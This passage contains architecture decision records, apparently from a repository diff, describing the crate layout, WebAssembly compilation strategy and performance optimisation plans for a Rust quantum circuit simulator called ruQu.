+--------v----------+
| ruqu-core |
| (quantum sim) |
+---+------+--------+
| |
+----------+ +----------+
| |
+--------v--------+ +-----------v---------+
| ruvector-math | | ruvector-metrics |
| (SIMD, linalg) | | (telemetry) |
+-----------------+ +---------------------+
|
+--------v--------+
| ruQu (existing) |
| (min-cut, MWPM) |
+-----------------+
```
## Decision
Adopt a **three-crate architecture** for the quantum engine, each with a
clearly defined responsibility boundary.
### Crate 1: `ruqu-core` -- Pure Rust Simulation Library
The core simulation engine, containing all quantum computation logic.
**Responsibilities**:
- `QuantumCircuit`: Circuit representation and manipulation
- `QuantumState`: State-vector storage and operations
- `Gate` enum: Full gate set (Pauli, Hadamard, CNOT, Toffoli, parametric rotations, etc.)
- Measurement operations (computational basis, Pauli basis, mid-circuit)
- Circuit optimization passes (gate fusion, cancellation)
- Noise model application (optional)
- Entanglement tracking for state splitting
**Design constraints**:
- `#![no_std]` with `alloc` for embedded/WASM portability
- Zero required external dependencies beyond `alloc`
- All platform-specific code behind feature flags
**Feature flags**:
| Flag | Default | Description |
|------|---------|-------------|
| `std` | off | Enable std library features (file I/O, advanced error types) |
| `parallel` | off | Enable Rayon-based multi-threaded gate application |
| `gpu` | off | Enable wgpu-based GPU acceleration for large states |
| `tensor-network` | off | Enable tensor network backend for shallow circuits |
| `noise-model` | off | Enable depolarizing, amplitude damping, and custom noise channels |
| `f32` | off | Use f32 precision instead of f64 (halves memory, reduces accuracy) |
| `serde` | off | Enable serialization of circuits and states |
**Module structure**:
```
ruqu-core/
src/
lib.rs # Crate root, feature flag gating
state.rs # QuantumState: amplitude storage, initialization
circuit.rs # QuantumCircuit: gate sequence, metadata
gates/
mod.rs # Gate enum and dispatch
single.rs # Single-qubit gates (H, X, Y, Z, S, T, Rx, Ry, Rz, U3)
two.rs # Two-qubit gates (CNOT, CZ, SWAP, Rxx, Ryy, Rzz)
multi.rs # Multi-qubit gates (Toffoli, Fredkin, custom unitaries)
parametric.rs # Parameterized gate support for variational algorithms
execution/
mod.rs # Execution engine dispatch
statevector.rs # Full state-vector simulation engine
tensor.rs # Tensor network backend (feature-gated)
noise.rs # Noise channel application (feature-gated)
measurement.rs # Measurement: sampling, expectation values
optimize/
mod.rs # Circuit optimization pipeline
fusion.rs # Gate fusion pass
cancel.rs # Gate cancellation (HH=I, XX=I, etc.)
commute.rs # Commutation-based reordering
entanglement.rs # Entanglement tracking and state splitting
types.rs # Complex number types, precision configuration
error.rs # Error types (QubitOverflow, InvalidGate, etc.)
Cargo.toml
benches/
statevector.rs # Criterion benchmarks for core operations
```
**Public API surface**:
```rust
// Core types
pub struct QuantumState { /* ... */ }
pub struct QuantumCircuit { /* ... */ }
pub enum Gate { H, X, Y, Z, S, T, CNOT, CZ, Rx(f64), Ry(f64), Rz(f64), /* ... */ }
// Circuit construction
impl QuantumCircuit {
pub fn new(num_qubits: usize) -> Result<Self, QubitOverflow>;
pub fn gate(&mut self, gate: Gate, targets: &[usize]) -> &mut Self;
pub fn measure(&mut self, qubit: usize) -> &mut Self;
pub fn measure_all(&mut self) -> &mut Self;
pub fn barrier(&mut self) -> &mut Self;
pub fn depth(&self) -> usize;
pub fn gate_count(&self) -> usize;
pub fn optimize(&mut self) -> &mut Self;
}
// Execution
impl QuantumState {
pub fn new(num_qubits: usize) -> Result<Self, QubitOverflow>;
pub fn execute(&mut self, circuit: &QuantumCircuit) -> ExecutionResult;
pub fn sample(&self, shots: usize) -> Vec<BitString>;
pub fn expectation(&self, observable: &Observable) -> f64;
pub fn probabilities(&self) -> Vec<f64>;
pub fn amplitude(&self, basis_state: usize) -> Complex<f64>;
}
```
### Crate 2: `ruqu-wasm` -- WebAssembly Bindings
WASM-specific bindings exposing the quantum engine to JavaScript environments.
**Responsibilities**:
- wasm-bindgen annotated wrapper types
- JavaScript-friendly API (string-based circuit construction, JSON results)
- Memory limit enforcement (reject circuits exceeding WASM address space)
- Optional multi-threading via wasm-bindgen-rayon
**Design constraints**:
- Mirrors the `ruvector-router-wasm` crate pattern
- Thin wrapper; all logic delegated to `ruqu-core`
- TypeScript type definitions auto-generated
**Module structure**:
```
ruqu-wasm/
src/
lib.rs # wasm-bindgen entry points
circuit.rs # JS-facing QuantumCircuit wrapper
state.rs # JS-facing QuantumState wrapper
types.rs # JS-compatible type conversions
limits.rs # WASM memory limit checks
Cargo.toml
pkg/ # wasm-pack output (generated)
tests/
web.rs # wasm-bindgen-test browser tests
```
**JavaScript API**:
```javascript
import { QuantumCircuit, QuantumState } from 'ruqu-wasm';
// Construct circuit
const circuit = new QuantumCircuit(4);
circuit.h(0);
circuit.cnot(0, 1);
circuit.cnot(1, 2);
circuit.cnot(2, 3);
circuit.measureAll();
// Execute
const state = new QuantumState(4);
const result = state.execute(circuit);
// Sample measurement outcomes
const counts = state.sample(1024);
console.log(counts); // { "0000": 512, "1111": 512 }
// Get probabilities
const probs = state.probabilities();
```
**Memory limit enforcement**:
```rust
const WASM_MAX_QUBITS: usize = 25;
const WASM_MAX_STATE_BYTES: usize = 1 << 30; // 1 GB
pub fn check_wasm_limits(num_qubits: usize) -> Result<(), WasmLimitError> {
if num_qubits > WASM_MAX_QUBITS {
return Err(WasmLimitError::QubitOverflow {
requested: num_qubits,
maximum: WASM_MAX_QUBITS,
estimated_bytes: 16 * (1usize << num_qubits),
});
}
Ok(())
}
```
### Crate 3: `ruqu-algorithms` -- High-Level Algorithm Implementations
Quantum algorithm implementations built on top of `ruqu-core`.
**Responsibilities**:
- VQE (Variational Quantum Eigensolver) with classical optimizer integration
- Grover's search with oracle construction helpers
- QAOA (Quantum Approximate Optimization Algorithm)
- Quantum error correction (surface codes, stabilizer codes)
- Hamiltonian simulation primitives (Trotterization)
**Module structure**:
```
ruqu-algorithms/
src/
lib.rs
vqe/
mod.rs # VQE orchestration
ansatz.rs # Parameterized ansatz circuits (UCCSD, HEA)
hamiltonian.rs # Hamiltonian representation and decomposition
optimizer.rs # Classical optimizer trait + implementations
grover/
mod.rs # Grover's algorithm orchestration
oracle.rs # Oracle construction utilities
diffusion.rs # Diffusion operator
qaoa/
mod.rs # QAOA orchestration
mixer.rs # Mixer Hamiltonian circuits
cost.rs # Cost function encoding
qec/
mod.rs # QEC framework
surface.rs # Surface code implementation
stabilizer.rs # Stabilizer formalism
decoder.rs # Bridge to ruQu's MWPM decoder
trotter.rs # Trotterization for Hamiltonian simulation
utils.rs # Shared utilities (state preparation, etc.)
Cargo.toml
```
**VQE example**:
```rust
use ruqu_core::{QuantumCircuit, QuantumState};
use ruqu_algorithms::vqe::{VqeSolver, Hamiltonian, HardwareEfficientAnsatz};
let hamiltonian = Hamiltonian::from_pauli_sum(&[
(0.5, "ZZ", &[0, 1]),
(0.3, "X", &[0]),
(0.3, "X", &[1]),
]);
let ansatz = HardwareEfficientAnsatz::new(2, depth: 3);
let solver = VqeSolver::new(hamiltonian, ansatz)
.optimizer(NelderMead::default())
.max_iterations(200)
.convergence_threshold(1e-6);
let result = solver.solve();
println!("Ground state energy: {:.6}", result.energy);
```
### Integration Points
#### Agent Activation
Quantum circuits are triggered via the ruVector agent context system. An agent
can invoke simulation through graph query extensions:
```
Agent Query: "Simulate VQE for H2 molecule at bond length 0.74 A"
|
v
Agent Framework --> ruqu-algorithms::vqe::VqeSolver
| |
| +--> ruqu-core (multiple circuit executions)
| |
|<-- VqeResult ------+
|
v
Agent Response: { energy: -1.137, parameters: [...], iterations: 47 }
```
#### Memory Gating
Following ruVector's memory discipline (ADR-006):
- State vectors allocated exclusively within `QuantumState::new()` scope
- All amplitudes dropped when `QuantumState` goes out of scope
- No lazy or cached allocations persist between simulations
- Peak memory tracked and reported via `ruvector-metrics`
#### Observability
Every simulation reports metrics through the existing `ruvector-metrics` pipeline:
| Metric | Type | Description |
|--------|------|-------------|
| `ruqu.simulation.qubits` | Gauge | Number of qubits in current simulation |
| `ruqu.simulation.gates` | Counter | Total gates applied |
| `ruqu.simulation.depth` | Gauge | Circuit depth after optimization |
| `ruqu.simulation.duration_ns` | Histogram | Wall-clock simulation time |
| `ruqu.simulation.peak_memory_bytes` | Gauge | Peak memory during simulation |
| `ruqu.optimization.gates_eliminated` | Counter | Gates removed by optimization passes |
| `ruqu.measurement.shots` | Counter | Total measurement shots taken |
#### Coherence Bridge
The existing `ruQu` crate's min-cut analysis and MWPM decoders remain in place
and become accessible from `ruqu-algorithms` for quantum error correction:
```
ruqu-algorithms::qec::surface
|
+-- build syndrome graph
|
+-- invoke ruQu::mwpm::decode(syndrome)
|
+-- apply corrections to ruqu-core::QuantumState
```
This avoids duplicating decoding logic and leverages the existing, tested
classical infrastructure.
#### Math Reuse
`ruqu-core` depends on `ruvector-math` for SIMD-optimized operations:
- Complex number arithmetic (add, multiply, conjugate) using SIMD lanes
- Aligned memory allocation for state vectors
- Batch operations on amplitude arrays
- Norm calculation for state normalization
```rust
// In ruqu-core, gate application uses ruvector-math SIMD utilities
use ruvector_math::simd::{complex_mul_f64x4, complex_add_f64x4};
fn apply_single_qubit_gate(
state: &mut [Complex<f64>],
target: usize,
matrix: [[Complex<f64>; 2]; 2],
) {
let step = 1 << target;
for block in (0..state.len()).step_by(2 * step) {
for i in block..block + step {
let (a, b) = (state[i], state[i + step]);
state[i] = matrix[0][0] * a + matrix[0][1] * b;
state[i + step] = matrix[1][0] * a + matrix[1][1] * b;
}
}
}
```
### Dependency Graph
```
ruqu-algorithms
|
+---> ruqu-core
| |
| +---> ruvector-math (SIMD utilities)
| +---> ruvector-metrics (optional, behind "metrics" feature)
|
+---> ruQu (existing, for MWPM decoders in QEC)
ruqu-wasm
|
+---> ruqu-core
+---> wasm-bindgen
+---> wasm-bindgen-rayon (optional, behind "threads" feature)
```
### Workspace Cargo.toml Additions
```toml
[workspace]
members = [
# ... existing 73+ crates ...
"crates/ruqu-core",
"crates/ruqu-wasm",
"crates/ruqu-algorithms",
]
```
## Consequences
### Positive
- **Clean separation of concerns**: Each crate has a single, well-defined
responsibility -- simulation, WASM bindings, and algorithms respectively
- **Independent testing**: Each crate can be tested in isolation with its own
benchmark suite
- **Minimal WASM surface**: `ruqu-wasm` remains a thin wrapper, keeping the
compiled `.wasm` module small
- **Reuse of infrastructure**: SIMD, metrics, and classical decoders are shared,
not duplicated
- **Follows workspace conventions**: Same patterns as existing crates, reducing
onboarding friction for contributors
### Negative
- **Three crates to maintain**: Each requires its own CI, documentation, and
version management
- **Cross-crate API stabilization**: Changes to `ruqu-core`'s public API affect
both `ruqu-wasm` and `ruqu-algorithms`
- **Feature flag combinatorics**: Multiple feature flags across three crates
create a testing matrix that must be validated
### Risks and Mitigations
| Risk | Mitigation |
|------|------------|
| API churn in ruqu-core destabilizing dependents | Semver discipline; stabilize core types before 1.0 |
| Feature flag combinations causing compilation failures | CI matrix testing all supported flag combinations |
| Coherence bridge creating tight coupling with ruQu | Trait-based decoder interface; ruQu dependency optional |
| WASM crate size exceeding 2MB target | Regular binary size audits; aggressive dead code elimination |
## References
- [ADR-QE-001: Quantum Engine Core Architecture](./ADR-QE-001-quantum-engine-core-architecture.md)
- [ADR-QE-003: WASM Compilation Strategy](./ADR-QE-003-wasm-compilation-strategy.md)
- [ADR-QE-004: Performance Optimization & Benchmarks](./ADR-QE-004-performance-optimization-benchmarks.md)
- [Workspace Cargo.toml](/Cargo.toml)
- [ruvector-router-wasm pattern](/crates/ruvector-router-wasm/)
- [ruQu crate](/crates/ruQu/)
- [ruvector-math crate](/crates/ruvector-math/)
- [ruvector-metrics crate](/crates/ruvector-metrics/)

View File

@@ -0,0 +1,459 @@
# ADR-QE-003: WebAssembly Compilation Strategy
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Context
### Problem Statement
ruVector targets browsers, embedded/edge runtimes, and IoT devices via
WebAssembly. The quantum simulation engine must compile to
`wasm32-unknown-unknown` and run correctly in these constrained environments.
WASM introduces fundamental constraints that differ significantly from native
execution and must be addressed at the architectural level rather than
worked around at runtime.
### WASM Execution Environment Constraints
| Constraint | Detail | Impact on Quantum Simulation |
|------------|--------|------------------------------|
| 32-bit address space | ~4 GB theoretical max, ~2 GB practical | Hard ceiling on state vector size |
| Memory model | Linear memory, grows in 64 KB pages | Allocation must be page-aware |
| No native threads | Web Workers required for parallelism | Requires SharedArrayBuffer + COOP/COEP headers |
| No direct GPU | WebGPU is separate API, not WASM-native | GPU acceleration unavailable in WASM path |
| No OS syscalls | Sandboxed execution, no file/network | All I/O must go through host bindings |
| JIT compilation | V8/SpiderMonkey JIT, not AOT | ~1.5-3x slower than native, variable warmup |
| SIMD support | 128-bit SIMD proposal (widely supported since 2021) | 4 f32 or 2 f64 per vector lane |
| Stack size | Default ~1 MB, configurable | Deep recursion limited |
### Memory Budget Analysis for Quantum Simulation
The critical constraint is WASM's 32-bit address space. With a practical
usable limit of approximately 2 GB (due to browser memory allocation
behavior and address space fragmentation), the maximum feasible state vector
size is bounded:
```
Available WASM Memory Budget:
Total addressable: 4,294,967,296 bytes (4 GB theoretical)
Practical usable: ~2,147,483,648 bytes (2 GB, browser-dependent)
WASM overhead: ~100,000,000 bytes (module, stack, heap metadata)
Application overhead: ~50,000,000 bytes (circuit data, scratch buffers)
-------------------------------------------------
Available for state: ~2,000,000,000 bytes (1.86 GB)
State vector sizes:
24 qubits: 268,435,456 bytes (256 MB) -- comfortable
25 qubits: 536,870,912 bytes (512 MB) -- feasible
25 + scratch: ~1,073,741,824 bytes -- tight but within budget
26 qubits: 1,073,741,824 bytes (1 GB) -- state alone, no scratch room
27 qubits: 2,147,483,648 bytes (2 GB) -- exceeds practical limit
```
### Existing WASM Patterns in ruVector
The `ruvector-router-wasm` crate establishes conventions for WASM compilation:
- `wasm-pack build` as the compilation tool
- `wasm-bindgen` for JavaScript interop
- TypeScript definition generation
- Feature-flag controlled inclusion/exclusion of capabilities
- Dedicated test suites using `wasm-bindgen-test`
## Decision
### 1. Target and Toolchain
**Target triple**: `wasm32-unknown-unknown`
**Build toolchain**: `wasm-pack` with `wasm-bindgen`
```bash
# Development build
wasm-pack build crates/ruqu-wasm --target web --dev
# Release build with size optimization
wasm-pack build crates/ruqu-wasm --target web --release
# Node.js target (for server-side WASM)
wasm-pack build crates/ruqu-wasm --target nodejs --release
```
**Cargo profile for WASM release**:
```toml
[profile.wasm-release]
inherits = "release"
opt-level = "z" # Optimize for binary size
lto = true # Link-time optimization
codegen-units = 1 # Single codegen unit for maximum optimization
strip = true # Strip debug symbols
panic = "abort" # Smaller panic handling
```
### 2. Memory Limit Enforcement
`ruqu-wasm` enforces qubit limits before any allocation occurs. This is a hard
gate, not a soft warning.
**Enforcement strategy**:
```
User requests N qubits
|
v
[N <= 25?] ---NO---> Return WasmLimitError {
| requested: N,
YES maximum: 25,
| estimated_memory: 16 * 2^N,
v suggestion: "Use native build for >25 qubits"
[Estimate total }
memory needed]
|
v
[< 1.5 GB?] ---NO---> Return WasmLimitError::InsufficientMemory
|
YES
|
v
Proceed with allocation
```
**Qubit limits by precision**:
| Precision | Max Qubits (WASM) | State Size | With Scratch |
|-----------|--------------------|------------|--------------|
| Complex f64 (default) | 25 | 512 MB | ~1.07 GB |
| Complex f32 (optional) | 26 | 512 MB | ~1.07 GB |
**Error reporting**:
```rust
#[wasm_bindgen]
#[derive(Debug)]
pub struct WasmLimitError {
pub requested_qubits: usize,
pub maximum_qubits: usize,
pub estimated_bytes: usize,
pub message: String,
}
impl WasmLimitError {
pub fn qubit_overflow(requested: usize) -> Self {
let max = if cfg!(feature = "f32") { 26 } else { 25 };
let bytes_per_amplitude = if cfg!(feature = "f32") { 8 } else { 16 };
Self {
requested_qubits: requested,
maximum_qubits: max,
estimated_bytes: bytes_per_amplitude * (1usize << requested),
message: format!(
"Cannot simulate {} qubits in WASM: requires {} bytes, \
exceeds WASM address space. Maximum: {} qubits. \
Use native build for larger simulations.",
requested,
bytes_per_amplitude * (1usize << requested),
max
),
}
}
}
```
### 3. Threading Strategy
WASM multi-threading requires SharedArrayBuffer, which in turn requires
specific HTTP security headers (Cross-Origin-Opener-Policy and
Cross-Origin-Embedder-Policy). Not all deployment environments support these.
**Strategy**: Optional multi-threading with graceful fallback.
```
ruqu-wasm execution
|
v
[SharedArrayBuffer
available?]
/ \
YES NO
/ \
[wasm-bindgen-rayon] [single-threaded
parallel execution] execution]
| |
Split state vector Sequential gate
across Web Workers application
| |
v v
Fast (N cores) Slower (1 core)
```
**Compile-time configuration**:
```toml
# In ruqu-wasm/Cargo.toml
[features]
default = []
threads = ["wasm-bindgen-rayon", "ruqu-core/parallel"]
```
**Runtime detection**:
```rust
#[wasm_bindgen]
pub fn threading_available() -> bool {
// Check if SharedArrayBuffer is available in this environment
js_sys::eval("typeof SharedArrayBuffer !== 'undefined'")
.ok()
.and_then(|v| v.as_bool())
.unwrap_or(false)
}
```
**Required HTTP headers for threading**:
```
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
```
### 4. SIMD Utilization
The WASM SIMD proposal (128-bit vectors) is widely supported in modern browsers
and runtimes. The quantum engine uses SIMD for amplitude manipulation when
available.
**WASM SIMD capabilities**:
| Operation | WASM SIMD Instruction | Use in Quantum Sim |
|-----------|-----------------------|--------------------|
| f64x2 multiply | `f64x2.mul` | Complex multiplication (real part) |
| f64x2 add | `f64x2.add` | Amplitude accumulation |
| f64x2 sub | `f64x2.sub` | Complex multiplication (cross terms) |
| f64x2 shuffle | `i64x2.shuffle` | Swapping real/imaginary parts |
| f32x4 multiply | `f32x4.mul` | f32 mode complex multiply |
| f32x4 fma | emulated | Fused multiply-add for accuracy |
**Conditional compilation**:
```rust
// In ruqu-core, WASM SIMD path
#[cfg(all(target_arch = "wasm32", target_feature = "simd128"))]
mod wasm_simd {
use core::arch::wasm32::*;
/// Apply 2x2 unitary to a pair of amplitudes using WASM SIMD
#[inline(always)]
pub fn apply_gate_2x2_simd(
a_re: f64, a_im: f64,
b_re: f64, b_im: f64,
u00_re: f64, u00_im: f64,
u01_re: f64, u01_im: f64,
u10_re: f64, u10_im: f64,
u11_re: f64, u11_im: f64,
) -> (f64, f64, f64, f64) {
// Pack amplitude pair into SIMD lanes
let a = f64x2(a_re, a_im);
let b = f64x2(b_re, b_im);
// Complex multiply-accumulate for output amplitudes
// c0 = u00*a + u01*b
// c1 = u10*a + u11*b
// (expanded for complex arithmetic)
// ...
todo!()
}
}
// Fallback scalar path
#[cfg(not(all(target_arch = "wasm32", target_feature = "simd128")))]
mod scalar {
// Pure scalar complex arithmetic
}
```
**Comparison of SIMD widths across targets**:
```
Native (AVX-512): 512-bit = 8 f64 = 4 complex f64 per instruction
Native (AVX2): 256-bit = 4 f64 = 2 complex f64 per instruction
Native (NEON): 128-bit = 2 f64 = 1 complex f64 per instruction
WASM SIMD: 128-bit = 2 f64 = 1 complex f64 per instruction
```
WASM SIMD matches ARM NEON width but is slower due to JIT overhead. The engine
uses the same algorithmic structure as the NEON path, adapted for WASM SIMD
intrinsics.
### 5. No GPU in WASM
GPU acceleration is exclusively available in native builds. The WASM path
uses CPU-only simulation.
**Rationale**:
- WebGPU is a separate browser API, not accessible from WASM linear memory
- Bridging WASM to WebGPU would require complex JavaScript glue code
- WebGPU compute shader support varies across browsers
- The performance benefit is uncertain for the 25-qubit WASM ceiling
**Future consideration**: If WebGPU stabilizes and WASM-WebGPU interop matures,
a `ruqu-webgpu` crate could provide browser-side GPU acceleration. This is out
of scope for the initial release.
### 6. API Parity
`ruqu-wasm` exposes an API that is functionally identical to `ruqu-core` native.
The same circuit description produces the same measurement results (within
floating-point tolerance). Only performance and capacity differ.
**Parity guarantee**:
```
Same Circuit
|
+------------+------------+
| |
ruqu-core (native) ruqu-wasm (browser)
| |
- 30+ qubits - 25 qubits max
- AVX2/AVX-512 SIMD - WASM SIMD128
- Rayon threading - Optional Web Workers
- Optional GPU - CPU only
- ~17.5M gates/sec - ~5-12M gates/sec
| |
+------------+------------+
|
Same Results
(within fp tolerance)
```
**Verified by**: Shared test suite that runs against both native and WASM targets,
comparing outputs bitwise (for deterministic operations) or statistically (for
measurement sampling).
### 7. Module Size Target
Target `.wasm` binary size: **< 2 MB** for the default feature set.
**Size budget**:
| Component | Estimated Size |
|-----------|---------------|
| Core simulation engine | ~800 KB |
| Gate implementations | ~200 KB |
| Measurement and sampling | ~100 KB |
| wasm-bindgen glue | ~50 KB |
| Circuit optimization | ~150 KB |
| Error handling and validation | ~50 KB |
| **Total (default features)** | **~1.35 MB** |
| + noise-model feature | +200 KB |
| + tensor-network feature | +400 KB |
| **Total (all features)** | **~1.95 MB** |
**Size reduction techniques**:
- `opt-level = "z"` for size-optimized compilation
- LTO (Link-Time Optimization) for dead code elimination
- `wasm-opt` post-processing pass (binaryen)
- Feature flags to exclude unused capabilities
- `panic = "abort"` to eliminate unwinding machinery
- Avoid `format!` and `std::fmt` where possible in hot paths
**Build pipeline**:
```bash
# Build with wasm-pack
wasm-pack build crates/ruqu-wasm --target web --release
# Post-process with wasm-opt for additional size reduction
wasm-opt -Oz --enable-simd \
crates/ruqu-wasm/pkg/ruqu_wasm_bg.wasm \
-o crates/ruqu-wasm/pkg/ruqu_wasm_bg.wasm
# Verify size
ls -lh crates/ruqu-wasm/pkg/ruqu_wasm_bg.wasm
# Expected: < 2 MB
```
### 8. Future: wasm64 (Memory64 Proposal)
The WebAssembly Memory64 proposal extends the address space to 64 bits,
removing the 4 GB limitation. When this proposal reaches broad runtime support:
- Recompile `ruqu-wasm` targeting `wasm64-unknown-unknown`
- Lift the 25-qubit ceiling to match native limits
- Maintain backward compatibility with wasm32 via conditional compilation
**Current status**: Memory64 is at Phase 4 (standardized) in the WASM
specification process. Browser support is emerging but not yet universal.
**Migration path**:
```toml
# Future Cargo.toml
[features]
wasm64 = [] # Enable when targeting wasm64
# In code
#[cfg(feature = "wasm64")]
const MAX_QUBITS_WASM: usize = 30;
#[cfg(not(feature = "wasm64"))]
const MAX_QUBITS_WASM: usize = 25;
```
## Trade-offs Accepted
| Trade-off | Accepted Limitation | Justification |
|-----------|---------------------|---------------|
| Performance | ~1.5-3x slower than native | Universal deployment outweighs raw speed |
| Qubit ceiling | 25 qubits in WASM vs 30+ native | Sufficient for most educational and research workloads |
| Threading | Requires specific browser headers | Graceful fallback ensures always-works baseline |
| No GPU | CPU-only in browser | GPU simulation at 25 qubits shows minimal benefit |
| Binary size | ~1.35 MB module | Acceptable for a quantum simulation library |
## Consequences
### Positive
- **Universal deployment**: Any modern browser or WASM runtime can execute
quantum simulations without installation
- **Security sandboxing**: WASM's memory isolation prevents quantum simulation
code from accessing host resources
- **Edge-aligned**: Matches ruVector's philosophy of computation at the edge
- **Testable**: WASM builds can be tested in CI via headless browsers and
wasm-bindgen-test
- **Progressive enhancement**: Single-threaded baseline with optional threading
ensures broad compatibility
### Negative
- **Performance ceiling**: JIT overhead and narrower SIMD limit throughput
- **Memory limits**: 25-qubit hard ceiling until wasm64 adoption
- **Threading complexity**: SharedArrayBuffer requirement adds deployment
configuration burden
- **Debugging difficulty**: WASM debugging tools are less mature than native
debuggers
### Mitigations
| Issue | Mitigation |
|-------|------------|
| Performance gap | Document native vs WASM trade-offs; recommend native for >20 qubits |
| Memory exhaustion | Hard limit enforcement with informative error messages |
| Threading failures | Automatic fallback to single-threaded; no silent degradation |
| Debug difficulty | Source maps via wasm-pack; comprehensive logging to console |
| Binary size creep | CI size gate: fail build if .wasm exceeds 2 MB |
## References
- [ADR-QE-001: Quantum Engine Core Architecture](./ADR-QE-001-quantum-engine-core-architecture.md)
- [ADR-QE-002: Crate Structure & Integration](./ADR-QE-002-crate-structure-integration.md)
- [ADR-QE-004: Performance Optimization & Benchmarks](./ADR-QE-004-performance-optimization-benchmarks.md)
- [ADR-005: WASM Runtime Integration](/docs/adr/ADR-005-wasm-runtime-integration.md)
- [ruvector-router-wasm crate](/crates/ruvector-router-wasm/)
- [WebAssembly SIMD Proposal](https://github.com/WebAssembly/simd)
- [WebAssembly Memory64 Proposal](https://github.com/WebAssembly/memory64)
- [wasm-bindgen-rayon](https://github.com/RReverser/wasm-bindgen-rayon)
- [Cross-Origin Isolation Guide (MDN)](https://developer.mozilla.org/en-US/docs/Web/API/crossOriginIsolated)

View File

@@ -0,0 +1,564 @@
# ADR-QE-004: Performance Optimization & Benchmarks
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Context
### Problem Statement
Quantum state-vector simulation is computationally expensive. Every gate
application touches the full amplitude vector of 2^n complex numbers, making
gate application O(2^n) per gate for n qubits. For the quantum engine to be
practical on edge devices and in browser environments, it must achieve
competitive performance: millions of gates per second for small circuits,
interactive latency for 10-20 qubit workloads, and the ability to handle
moderately deep circuits (thousands of gates) without unacceptable delays.
### Computational Cost Model
For a circuit with n qubits, g gates, and s measurement shots:
```
Total operations (approximate):
Single-qubit gate: 2^n complex multiplications + 2^n complex additions
Two-qubit gate: 2^(n+1) complex multiplications + 2^(n+1) complex additions
Measurement (1 shot): 2^n probability calculations + sampling
Full circuit: sum_i(cost(gate_i)) + s * 2^n
Example: 20-qubit circuit, 500 gates, 1024 shots
Gate cost: 500 * 2^20 * ~4 FLOP = ~2.1 billion FLOP
Measure: 1024 * 2^20 * ~2 FLOP = ~2.1 billion FLOP
Total: ~4.2 billion FLOP
```
At 10 GFLOP/s (realistic single-core throughput), this is ~420 ms. With SIMD
and multi-threading, we target 10-50x improvement.
### Performance Baseline from Comparable Systems
| Simulator | Language | 20-qubit H gate | Notes |
|-----------|----------|-----------------|-------|
| Qiskit Aer | C++/Python | ~50 ns | Heavily optimized, OpenMP |
| Cirq | Python/C++ | ~200 ns | Google, less optimized |
| QuantRS2 | Rust | ~57 ns | Rust-native, AVX2 |
| Quest | C | ~40 ns | GPU-capable, highly tuned |
| Target (ruQu) | Rust | < 60 ns | Competitive with QuantRS2 |
These benchmarks measure per-gate time on a single-qubit Hadamard applied to
a 20-qubit state vector. Our target is to match or beat QuantRS2, the closest
comparable pure-Rust implementation.
## Decision
Implement a **multi-layered optimization strategy** with six complementary
techniques, each addressing a different performance bottleneck.
### Layer 1: SIMD Operations
Use `ruvector-math` SIMD utilities to vectorize amplitude manipulation.
Gate application fundamentally involves applying a 2x2 or 4x4 unitary matrix
to pairs/quadruples of complex amplitudes. SIMD processes multiple amplitude
components simultaneously.
**Native SIMD dispatch**:
```
Architecture Instruction Set Complex f64 per Cycle
----------- --------------- ---------------------
x86_64 AVX-512 4 (512-bit / 128-bit per complex)
x86_64 AVX2 2 (256-bit / 128-bit per complex)
ARM64 NEON 1 (128-bit / 128-bit per complex)
WASM SIMD128 1 (128-bit / 128-bit per complex)
Fallback Scalar 1 (sequential)
```
**Single-qubit gate application with AVX2**:
```
For each pair of amplitudes (a[i], a[i + 2^target]):
Load: a_re, a_im = load_f64x4([a[i].re, a[i].im, a[i+step].re, a[i+step].im])
Compute c0 = u00 * a + u01 * b:
mul_re = u00_re * a_re - u00_im * a_im + u01_re * b_re - u01_im * b_im
mul_im = u00_re * a_im + u00_im * a_re + u01_re * b_im + u01_im * b_re
Compute c1 = u10 * a + u11 * b:
(analogous)
Store: [c0.re, c0.im, c1.re, c1.im]
```
With AVX2 (256-bit), we process 2 complex f64 values per instruction,
yielding a theoretical 2x speedup over scalar. With AVX-512, this doubles to
4x. Practical speedup is 1.5-3.5x due to instruction latency and memory
bandwidth.
**Target per-gate throughput**:
| Qubits | Amplitudes | AVX2 (est.) | AVX-512 (est.) | WASM SIMD (est.) |
|--------|------------|-------------|----------------|-------------------|
| 10 | 1,024 | ~15 ns | ~10 ns | ~30 ns |
| 15 | 32,768 | ~1 us | ~0.5 us | ~2 us |
| 20 | 1,048,576 | ~50 us | ~25 us | ~100 us |
| 25 | 33,554,432 | ~1.5 ms | ~0.8 ms | ~3 ms |
### Layer 2: Multithreading
Rayon-based data parallelism splits the state vector across CPU cores for
gate application. Each thread processes an independent contiguous block of
amplitudes.
**Parallelization strategy**:
```
State vector: [amp_0, amp_1, ..., amp_{2^n - 1}]
Thread 0: [amp_0 ... amp_{2^n/T - 1}]
Thread 1: [amp_{2^n/T} ... amp_{2*2^n/T - 1}]
...
Thread T-1:[amp_{(T-1)*2^n/T} ... amp_{2^n - 1}]
Where T = number of threads (Rayon work-stealing pool)
```
**Gate application requires care with target qubit position**:
- If `target < log2(chunk_size)`: each chunk contains complete amplitude pairs.
Threads are fully independent. No synchronization needed.
- If `target >= log2(chunk_size)`: amplitude pairs span chunk boundaries.
Must adjust chunk boundaries to align with gate structure.
**Expected scaling**:
```
Qubits Amps 1 thread 8 threads Speedup
------ ---- -------- --------- -------
15 32K 1 us ~200 ns ~5x
20 1M 50 us ~8 us ~6x
22 4M 200 us ~30 us ~6.5x
24 16M 800 us ~120 us ~6.7x
25 32M 1.5 ms ~220 us ~6.8x
```
Speedup plateaus below linear (8x for 8 threads) due to memory bandwidth
saturation. At 24+ qubits, the state vector exceeds L3 cache and performance
becomes memory-bound.
**Parallelism threshold**: Do not parallelize below 14 qubits (16K amplitudes).
The overhead of Rayon's work-stealing exceeds the benefit for small states.
### Layer 3: Gate Fusion
Preprocess circuits to combine consecutive gates into single matrix
operations, reducing the number of state vector passes.
**Fusion rules**:
```
Rule 1: Consecutive single-qubit gates on the same qubit
Rz(a) -> Rx(b) -> Rz(c) ==> U3(a, b, c) [single matrix multiply]
Rule 2: Consecutive two-qubit gates on the same pair
CNOT(0,1) -> CZ(0,1) ==> Fused_2Q(0,1) [4x4 matrix]
Rule 3: Single-qubit gate followed by controlled gate
H(0) -> CNOT(0,1) ==> Fused operation (absorb H into CNOT matrix)
Rule 4: Identity cancellation
H -> H ==> Identity (remove both)
